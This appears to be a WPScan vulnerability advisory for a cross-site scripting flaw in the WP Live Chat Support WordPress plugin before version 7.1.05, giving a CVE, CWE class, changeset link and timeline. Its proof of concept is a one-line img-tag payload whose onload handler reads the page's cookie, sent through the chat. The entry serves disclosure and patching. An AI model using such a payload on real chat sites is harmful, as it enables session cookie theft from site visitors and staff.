WP Live Chat Support < 7.1.05 - Cross-Site Scripting (XSS)



Description
WP Live Chat Support is vulnerable by sending XSS payloads through chat. 
Proof of Concept
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 />

Affects Plugin

fixed in version 7.1.05

References

CVE 2017-18507
URL https://plugins.trac.wordpress.org/changeset/1706931/wp-live-chat-support

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Omaid Faizyar
Submitter Website https://medium.com/@omaidfaizyar
Views 4457
Verified No
WPVDB ID 8880

Timeline

Publicly Published 2017-07-30 (almost 3 years ago)
Added 2017-08-07 (almost 3 years ago)
Last Updated 2020-03-21 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin